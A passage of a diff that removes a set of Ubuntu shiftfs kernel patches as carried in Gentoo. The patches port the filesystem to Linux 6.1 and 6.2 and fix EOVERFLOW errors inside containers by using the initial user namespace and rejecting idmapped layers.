-Date: Tue, 18 Oct 2022 17:09:12 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1 -Cc: mpagano@gentoo.org - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 5 ++--- - 1 file changed, 2 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a5338dc6290c..34f080ae0fec 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode, - } - - static int shiftfs_tmpfile(struct user_namespace *ns, -- struct inode *dir, struct dentry *dentry, -+ struct inode *dir, struct file *file, - umode_t mode) - { - int err; - const struct cred *oldcred; -- struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = dir->i_private; - - if (!loweri->i_op->tmpfile) - return -EOPNOTSUPP; - - oldcred = shiftfs_override_creds(dir->i_sb); -- err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode); -+ err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode); - revert_creds(oldcred); - - return err; --- -2.39.2 - -From a04c96a9da98441b39fd8425d19d2ae6d92c0bf9 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 4 Jan 2023 10:25:30 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support linux 6.2 -Cc: mpagano@gentoo.org - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 8 ++++---- - 1 file changed, 4 insertions(+), 4 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 34f080ae0fec..cda74b614505 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -912,7 +912,7 @@ shiftfs_get_acl(struct inode *inode, int type, bool rcu) - return NULL; - - oldcred = shiftfs_override_creds(inode->i_sb); -- lower_acl = get_acl(loweri, type); -+ lower_acl = get_inode_acl(loweri, type); - revert_creds(oldcred); - - if (lower_acl && !IS_ERR(lower_acl)) { -@@ -1026,13 +1026,13 @@ static const struct inode_operations shiftfs_dir_inode_operations = { - .permission = shiftfs_permission, - .getattr = shiftfs_getattr, - .listxattr = shiftfs_listxattr, -- .get_acl = shiftfs_get_acl, -+ .get_inode_acl = shiftfs_get_acl, - }; - - static const struct inode_operations shiftfs_file_inode_operations = { - .fiemap = shiftfs_fiemap, - .getattr = shiftfs_getattr, -- .get_acl = shiftfs_get_acl, -+ .get_inode_acl = shiftfs_get_acl, - .listxattr = shiftfs_listxattr, - .permission = shiftfs_permission, - .setattr = shiftfs_setattr, -@@ -1041,7 +1041,7 @@ static const struct inode_operations shiftfs_file_inode_operations = { - - static const struct inode_operations shiftfs_special_inode_operations = { - .getattr = shiftfs_getattr, -- .get_acl = shiftfs_get_acl, -+ .get_inode_acl = shiftfs_get_acl, - .listxattr = shiftfs_listxattr, - .permission = shiftfs_permission, - .setattr = shiftfs_setattr, --- -2.39.2 - -From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001 -From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com> -Date: Tue, 31 Jan 2023 17:11:48 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1990849 - -We haven't supported idmapped layers with shiftfs and moreover, that makes -no sense. Once lower fs support idmapped mounts when shiftfs is not needed. - -Starting from linux-image-5.15.0-48-generic users started seeing EOVERFLOW -errors from the userspace side on a trivial fs operations inside the containers. - -This is caused by patches ("fs: tweak fsuidgid_has_mapping()"), -("fs: support mapped mounts of mapped filesystems"). These patches extends -and enables idmapped mounts support in Ubuntu kernel, but the problem is -that shiftfs was not properly ported. - -See also: -("namei: prepare for idmapped mounts") -https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/ -("overlayfs: do not mount on top of idmapped mounts") -https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/ -as a reference. - -This patch should be appied on top of kinetic/master-next and based on the -changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns") - -This commit together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns") -have to be ported to the jammy tree too. - -Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15") -Reported-by: Thomas Parrott <thomas.parrott@canonical.com> -Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com> -Acked-by: Tim Gardner <tim.gardner@canonical.com> -Acked-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 16 +++++++++++++--- - 1 file changed, 13 insertions(+), 3 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index cda74b614505..2664e1fb65d3 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns, - struct inode *loweri_dir_old = lowerd_dir_old->d_inode, - *loweri_dir_new = lowerd_dir_new->d_inode; - struct renamedata rd = { -- .old_mnt_userns = ns, -+ .old_mnt_userns = &init_user_ns, - .old_dir = loweri_dir_old, - .old_dentry = lowerd_old, -- .new_mnt_userns = ns, -+ .new_mnt_userns = &init_user_ns, - .new_dir = loweri_dir_new, - .new_dentry = lowerd_new, - }; -@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, - return -EOPNOTSUPP; - if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode)) - return value ? -EACCES : 0; -- if (!inode_owner_or_capable(ns, inode)) -+ if (!inode_owner_or_capable(&init_user_ns, inode)) - return -EPERM; - - if (value) { -@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - goto out_put_path; - } - -+ /* -+ * It makes no sense to handle idmapped layers from shiftfs. -+ * And we didn't support it properly anyway. -+ */ -+ if (is_idmapped_mnt(path.mnt)) { -+ err = -EINVAL; -+ pr_err("idmapped layers are currently not supported\n"); -+ goto out_put_path; -+ } -+ - sb->s_flags |= SB_POSIXACL; - - if (sbinfo->mark) { --- -2.39.2 - |